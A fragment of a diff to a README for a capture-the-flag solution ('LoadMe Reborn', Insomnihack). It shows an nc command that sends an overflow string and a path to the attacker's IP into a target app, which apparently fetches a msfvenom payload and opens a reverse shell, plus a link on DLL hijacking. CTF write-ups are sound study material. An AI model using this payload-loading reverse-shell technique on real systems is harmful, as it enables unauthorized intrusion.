Balkghar/insomnihack_LoadMe-Reborn_solution/README.md

 ```
 echo '(stringlongenoughtodotheerror)//youripadress@80/msf' | nc 10.1.2.13 1234
 ```
 It'll launch the nc command and enter the string between the quotes in the app.
-Now in the shell where you have executed the reverse shell command, you have now access to the server and can get the flag who is in the .txt file !
+Now in the shell where you had executed the reverse shell command, you have now access to the server and can get the flag who is in the .txt file !
 ## Sources
 msfvenom :
 * https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dll-hijacking